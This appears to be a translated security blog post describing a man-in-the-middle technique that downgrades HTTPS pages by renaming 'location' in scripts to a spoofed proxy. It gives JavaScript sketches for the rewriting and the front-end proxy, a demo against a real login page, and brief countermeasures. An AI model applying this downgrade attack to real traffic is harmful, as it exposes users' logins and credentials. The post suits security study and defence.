EtherDream 2014/11/11 10:15
0x00 Preface
The HTTPS front-end hijacking scheme introduced earlier is interesting, but in practice it falls short. Its only, and biggest, drawback is that it cannot stop script-driven redirects. If it could, it would be perfect, and there would be no need to write this article.
At the end of the day, this is because the location object cannot be overridden, and it is the only way a script can redirect the page. There are hacks that can barely pull it off, but they are unreliable.
In fact, the recent HTML5 standard is very explicit about location: it is Unforgeable.
This is sad news. But it is also a good thing: it lets us drop all the evil tricks for good and look for a new way out.
0x01 Replacing plaintext URLs
As mentioned last time, in some scenarios you can take the SSLStrip approach and replace all HTTPS URLs in scripts with their HTTP versions.
Of course, there are obvious drawbacks. Whenever the URL does not appear in plain text, for example because it is built by concatenating strings, it cannot be recognized at all, and the page inevitably ends up redirecting to HTTPS.
This is not uncommon, so we need more advanced solutions.
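A minimal sketch of why plaintext replacement falls short, assuming a plain regular-expression rewrite over the script text. The helper name `stripHttps` and the example URLs are hypothetical and are not taken from SSLStrip itself.

```javascript
// Hypothetical helper: rewrite every literal https:// in a script to http://.
function stripHttps(script) {
  return script.replace(/https:\/\//g, 'http://');
}

// The URL appears in plain text, so the rewrite catches it.
const plain = "location.href = 'https://pay.example.com/';";

// The URL is assembled at run time, so there is nothing to match.
const built = "location.href = 'https' + ':/' + '/pay.example.com/';";

console.log(stripHttps(plain));
console.log(stripHttps(built) === built);
```

The second script still navigates to the HTTPS page, because the full URL only exists once the script runs.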
0x02 Replacing location
Even though we can’t rewrite location, it’s pretty easy to build something that does what location does. We only need to define a few getters and setters to simulate an identical location2. But how do we map the original location onto it?
This is where the back end comes in. Similar to replacing HTTPS URLs, this time we just look for the identifier location in scripts and change every occurrence to location2, so that all reads and writes related to the address bar land on our proxy. I don’t need to tell you what you can do after that.
- Proxy all setters: intercept any jump to HTTPS and downgrade it to the HTTP version.
- Proxy all getters: if the page is currently downgraded, return the URL with HTTPS restored. This fools scripts that check the protocol and completely disables their self-checks.
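The two rules above boil down to a pair of URL mappings. The sketch below is one possible shape for them, not the author's implementation: the function names are hypothetical, and the marker simply reuses the zh_cn mark that shows up in the address bar in the demo section, here assumed to be a query parameter.

```javascript
// Hypothetical marker name; assumed to travel as a query parameter.
const MARK = 'zh_cn';

// Setter side: turn an HTTPS target into a marked HTTP URL.
function downgrade(url) {
  const u = new URL(url);
  if (u.protocol !== 'https:') return url; // already HTTP, leave it alone
  u.protocol = 'http:';
  u.searchParams.set(MARK, '1');
  return u.href;
}

// Getter side: present a marked HTTP URL as the HTTPS URL it stands for.
function restore(url) {
  const u = new URL(url);
  if (!u.searchParams.has(MARK)) return url; // not a downgraded page
  u.searchParams.delete(MARK);
  u.protocol = 'https:';
  return u.href;
}

console.log(downgrade('https://passport.example.com/login'));
console.log(restore('http://passport.example.com/login?zh_cn=1'));
```

Keeping the marker in the URL lets the getter side decide, without any other state, whether the current page was downgraded.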
This scheme is much better than the earlier URL substitution: it is very common for URLs to be built dynamically, but extremely rare for location not to appear in plain text.
Even a minifier like Uglify does not mangle global variables; only an encrypted script would hide them. As for escaping it by hand on purpose, that would be absurd:
#! js
if (window['loc\ation'].protocol != 'https:') {
    // ...
}
At this point, our goals are clear:
- Front end: implement a location proxy.
- Back end: replace location in scripts with the proxy variable name.
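The back-end half can be sketched as a purely textual rename. This is a minimal illustration under the assumption that a word-boundary regular expression is good enough; the function name `rewriteLocation` is hypothetical.

```javascript
// Hypothetical back-end step: rename the identifier `location` in script text.
// \b keeps names such as `relocation` and an existing `location2` untouched.
function rewriteLocation(script) {
  return script.replace(/\blocation\b/g, 'location2');
}

const before = "if (location.protocol != 'https:') location.href = url;";
console.log(rewriteLocation(before));
```

Because the rename works on text, it also touches the word inside string literals and comments; for hijacking purposes that is usually harmless, but it is a limit of this sketch.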
0x03 Handling external scripts
While it is not difficult to replace the content of inline page scripts, external scripts are not so easy.
In reality, many pages link to scripts by absolute HTTPS URLs, and there our man-in-the-middle is helpless. To avoid this, we still need to replace the HTTPS URLs on the page, so that the man-in-the-middle controls more of the resources.
Replacing URLs is not hard; a simple regular expression can do it. But regular expressions operate on strings.
In reality, however, everything we receive is raw binary data, and not necessarily even UTF-8. In the last article, we injected directly at the binary level for simplicity. That is no longer a viable option.
Working on binary is not only hard to control, it is also imprecise: it is difficult to know whether we matched a whole character or just some bytes of a wide character. Therefore, we have to handle strings in the traditional, reliable way.
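A small illustration of the wide-character problem, assuming a Node.js back end (the `Buffer` global) and using UTF-16LE as the example encoding. The two characters are picked only because their bytes happen to spell an ASCII keyword.

```javascript
// Two CJK characters encoded as UTF-16LE; their bytes are 68 74 74 70.
const wide = Buffer.from('\u7468\u7074', 'utf16le');
const needle = Buffer.from('http', 'ascii');

// Byte-level search: reports a match that lies inside two wide characters.
const byteHit = wide.includes(needle);

// String-level search after decoding: no such text exists.
const textHit = wide.toString('utf16le').includes('http');

console.log(byteHit, textHit); // prints: true false
```

A byte-level replacement here would corrupt both characters, which is the reason for decoding before matching.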
0x04 Handling character set encoding
To do this, we have to rely on a character conversion library, such as the well-known iconv:
- First, convert the binary data to a UTF-8 string.
- With a standard string, our regular expressions run smoothly.
- Convert the processed string back to the original encoding.
This is necessary, even though it takes two conversions and costs a fair amount of performance.
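The three steps can be sketched as follows. The `codec` object is a hypothetical stand-in for whatever conversion library is used; to keep the sketch runnable without third-party modules, the demo codec is built on Node.js `Buffer` with UTF-16LE playing the role of the page's original encoding.

```javascript
// `codec` is a hypothetical interface: decode(bytes) -> string, encode(text) -> bytes.
function rewriteBody(bytes, codec, rewrite) {
  const text = codec.decode(bytes);   // 1. bytes -> string
  const changed = rewrite(text);      // 2. regular expressions on a real string
  return codec.encode(changed);       // 3. string -> original encoding
}

// Demo codec using Node.js Buffer; a real setup would plug in iconv here.
const utf16le = {
  decode: (bytes) => bytes.toString('utf16le'),
  encode: (text) => Buffer.from(text, 'utf16le'),
};

const body = Buffer.from('<script src="https://cdn.example.com/a.js">', 'utf16le');
const out = rewriteBody(body, utf16le, (s) => s.replace(/https:\/\//g, 'http://'));
console.log(out.toString('utf16le'));
```

Passing the codec in as a parameter keeps the rewrite logic independent of which encodings the conversion library supports.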
In fact, the process is not as smooth as expected. Quite a few servers do not specify the character set in the returned Content-Type, so we try to get it from the <meta> tag of the page.
But this tag comes in several forms. There is the older one:
#! html
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=GBK">
And the one popular now:
#! html
<meta charset="GBK" />
Although it’s easy to extract with a regular expression, a regular expression needs a string to work on, so we are back where we started.
The good news is that tags, attributes, and charset names are almost always pure ASCII, so you can first decode the binary as a UTF-8 string by default, extract the charset information from it, and then transcode properly.
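A minimal sketch of that sniffing step, assuming a Node.js back end. Two choices here are assumptions rather than anything stated above: the function name `sniffCharset` is hypothetical, and the bytes are decoded as Latin-1 instead of UTF-8, which maps every byte to exactly one character while leaving the ASCII parts identical. Only the first 1024 bytes are inspected, also an assumption.

```javascript
// Look for a charset declaration in the first bytes of an HTML response.
function sniffCharset(bytes) {
  // Latin-1 never fails to decode, and ASCII text comes out unchanged.
  const head = bytes.subarray(0, 1024).toString('latin1');
  // Covers both <meta charset="..."> and the older http-equiv form.
  const m = /<meta[^>]*charset\s*=\s*["']?([\w-]+)/i.exec(head);
  return m ? m[1].toLowerCase() : null;
}

const oldStyle = Buffer.from('<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=GBK">');
const newStyle = Buffer.from('<meta charset="GBK" />');
console.log(sniffCharset(oldStyle), sniffCharset(newStyle));
```

The returned name can then be handed to the conversion library for the real decode.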
0x05 Handling data chunking
Thanks to rich third-party extensions, none of these issues are difficult to solve.
However, one of the big advantages of front-end hijacking mentioned earlier is that instead of processing all the data, you only need to inject code into the first chunk. That advantage is now being severely tested.
We need to replace HTTPS resources, location variables, and so on in the page, which appear everywhere on the page. Would it be a problem if we filtered and forwarded each chunk individually?
In reality, this is not ideal: there is always a chance that a keyword to be replaced straddles two chunks.
In that case, neither the incomplete head nor the incomplete tail matches, so the occurrence is missed. The longer the keyword, the more likely this is. It is a real hazard for strings as long as URLs.
It’s a tricky problem to solve perfectly. However, there is a simple mitigation: keep the last few characters of each chunk and prepend them to the next chunk, which reduces the chance of a miss.
Of course, if the user experience is not a concern, the most convenient option is to collect all the data and process it in one go at the end.
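The tail-carrying idea can be sketched like this, assuming the chunks have already been decoded to strings and a single fixed keyword is being replaced. The name `createTailCarryReplacer` is hypothetical.

```javascript
// Replace `keyword` across chunk boundaries by holding back a short tail.
function createTailCarryReplacer(keyword, replacement) {
  let carry = '';
  return {
    push(chunk) {
      // Join the held-back tail with the new chunk, then replace.
      const text = (carry + chunk).split(keyword).join(replacement);
      // Hold back just enough characters to contain a partial keyword.
      const keep = Math.min(keyword.length - 1, text.length);
      carry = text.slice(text.length - keep);
      return text.slice(0, text.length - keep);
    },
    // Call once the stream ends to release the last held-back characters.
    flush() {
      const rest = carry;
      carry = '';
      return rest;
    },
  };
}

const replacer = createTailCarryReplacer('https://', 'http://');
const result = replacer.push('abc htt') + replacer.push('ps://x') + replacer.flush();
console.log(result);
```

This sketch assumes the replacement text cannot combine with later input to form the keyword again, which holds for the https to http case but not for arbitrary pairs.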
There is actually a better solution: the man-in-the-middle opens a buffer in which received data is temporarily cached. The cached data is processed in a batch once a certain amount has accumulated, or once no data has arrived for a certain period of time.
This avoids frequent handling of chunk boundaries and does not hold up the user’s response for long, which is the best of both worlds.
This smells a bit like TCP’s Nagle algorithm.
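One way such a buffer might look, as a sketch only. The names `createBatchBuffer`, `maxChars`, `idleMs`, and `onBatch` are hypothetical, and the thresholds are left to the caller.

```javascript
// Collect incoming text and hand it on in batches: either when enough
// has accumulated, or when no new data has arrived for `idleMs`.
function createBatchBuffer({ maxChars, idleMs, onBatch }) {
  let pending = '';
  let timer = null;

  function flush() {
    if (timer !== null) {
      clearTimeout(timer);
      timer = null;
    }
    if (pending === '') return;
    const batch = pending;
    pending = '';
    onBatch(batch);
  }

  return {
    push(text) {
      pending += text;
      if (pending.length >= maxChars) {
        flush();
        return;
      }
      // Restart the idle countdown on every new piece of data.
      if (timer !== null) clearTimeout(timer);
      timer = setTimeout(flush, idleMs);
    },
    // Call when the response ends to release whatever is left.
    end: flush,
  };
}
```

A keyword can still straddle two batches, just far less often than with raw chunks, so this combines naturally with holding back a short tail.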
0x06 Front-end location proxy
Having covered the details of the back end, let’s move on to the front end.
Implementing a location proxy is simple, but there are a few details worth noting:
- location exists not only on window; document has the same thing.
- The location object itself can be assigned to, which is equivalent to setting location.href. (The [PutForwards=href, …] attribute explains this well.)
- Similarly, toString on location returns the href property.
- If a script containing location2 gets cached, the user may hit errors later on a page that is not hijacked, so we need a compatible fallback.
- ...
Implementing a location proxy layer is relatively easy, as long as you think it through.
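A sketch of how the first three details might be covered. Everything named here is an assumption for illustration: `createLocation2`, `installLocation2`, and the two mapping functions `toHttp` (downgrade a URL) and `toHttps` (restore it), which are passed in rather than defined. The cached-script fallback is not shown.

```javascript
// Build a location-like object on top of the real one.
function createLocation2(real, toHttp, toHttps) {
  // Resolve relative URLs against the HTTPS view, then downgrade.
  const target = (url) => toHttp(new URL(String(url), toHttps(real.href)).href);
  return {
    get href() { return toHttps(real.href); },
    set href(url) { real.href = target(url); },
    get protocol() { return new URL(this.href).protocol; },
    assign(url) { real.assign(target(url)); },
    replace(url) { real.replace(target(url)); },
    // toString mirrors href, as on the real location.
    toString() { return this.href; },
  };
}

// Expose the proxy on an object; assigning to the property forwards to href.
function installLocation2(owner, proxy) {
  Object.defineProperty(owner, 'location2', {
    configurable: true,
    get() { return proxy; },
    set(url) { proxy.href = url; },
  });
}

// In a browser this would be called for both owners, for example:
//   const proxy = createLocation2(window.location, toHttp, toHttps);
//   installLocation2(window, proxy);
//   installLocation2(document, proxy);
```

Only href and protocol are proxied here; a fuller version would treat host, origin, and the other properties the same way.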
0x07 Dynamic Script Hijacking
Earlier I talked about replacing the HTTPS URLs on the page to ensure that external scripts are transferred in plaintext.
In reality, however, not all scripts are static. In this age of script-heavy pages, loading modules dynamically is common. If an HTTPS script is brought in this way, our man-in-the-middle is powerless again.
Thankfully, unlike location, module loading is not impossible to intercept. In fact there are many ways to intercept dynamic modules, and the methods and details discussed in the previous article “XSS Front-end Firewall: Suspicious Module Interception” come in handy.
In fact, this problem applies to frame pages as well as scripts. In the last article, we used CSP to block HTTPS frame pages. But that only blocks them; it does not truly intercept them. Only together with the current hook system does it become a complete interception system.
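One of the possible hook points is the URL property setter of an element prototype. The sketch below shows only that single technique and is not the method from the earlier article; `hookUrlSetter` and the rewrite function are hypothetical names.

```javascript
// Wrap the setter of an accessor property so every assigned URL is rewritten first.
function hookUrlSetter(proto, prop, rewrite) {
  const desc = Object.getOwnPropertyDescriptor(proto, prop);
  Object.defineProperty(proto, prop, {
    configurable: true,
    enumerable: desc.enumerable,
    get: desc.get,
    set(value) {
      desc.set.call(this, rewrite(String(value)));
    },
  });
}

// In a browser the targets would be, for example:
//   hookUrlSetter(HTMLScriptElement.prototype, 'src', toHttp);
//   hookUrlSetter(HTMLIFrameElement.prototype, 'src', toHttp);
```

Other entry points such as setAttribute or markup written through innerHTML bypass this hook and need their own interception.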
0x08 Demo
Having said all that, the real core is just changing the location variable in scripts; everything else exists to support it.
Let’s find a few sites that the previous tool failed on and try out this enhanced hijacking tool.
The last article mentioned that the Jingdong login redirects through a script. Let’s test it first.
When traffic passes through the man-in-the-middle proxy, location in pages and scripts becomes our variable name. So we are in control of everything that touches the address bar.
Note that there is a zh_cn mark in the address bar; it is the marker identifying a downgraded URL.
Everything read from location2 looks exactly as it would on an HTTPS page. Even if scripts have self-checks, they are fooled by our virtual environment.
Click login, and it naturally succeeds.
After all, HTTPS and HTTP differ only in transport. At the application level, a page has no way of knowing the difference, except by asking location from script, and that is exactly what we have hijacked.
Fortunately, we have replaced all the HTTPS URLs in the page, so we still land on the downgraded page.
It is worth noting that if you enter by clicking the QQ icon, the page goes directly to the HTTPS version and is not hijacked. Whether an entry from a third party can be hijacked is a matter of luck.
By normal developer thinking, nobody would escape the location variable. So this scheme can take down almost all secure sites.
Of course, foreign websites are no different. As long as HSTS has not been cached beforehand, hijacking is still easy.
...
So with enough imagination, an engineered, general-purpose hijacking scheme is still possible.
0x09 Preventive Measures
If you’ve been reading this carefully, you’ve already figured out what to do about it.
In fact, because JS is so flexible, it’s almost impossible to infer runtime behavior from static source code.
Therefore, simply by escaping and obfuscating the operations that involve location, you can avoid being hijacked by the man-in-the-middle. After all, parsing scripts while hijacking traffic is rather expensive.
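A small demonstration of why escaping works against a textual rewrite. It assumes the man-in-the-middle uses a word-boundary regular expression to rename location; the variable names are illustrative only.

```javascript
// Script source as it travels over the wire; String.raw keeps the backslash.
const source = String.raw`if (window['loc\ation'].protocol != 'https:') { /* ... */ }`;

// The assumed textual rename finds nothing to replace.
const rewritten = source.replace(/\blocation\b/g, 'location2');
console.log(rewritten === source);

// At run time, however, the escaped literal is the ordinary property name.
const key = 'loc\ation';
console.log(key === 'location');
```

The source text never contains the word the rewrite looks for, yet the running script reads the real location.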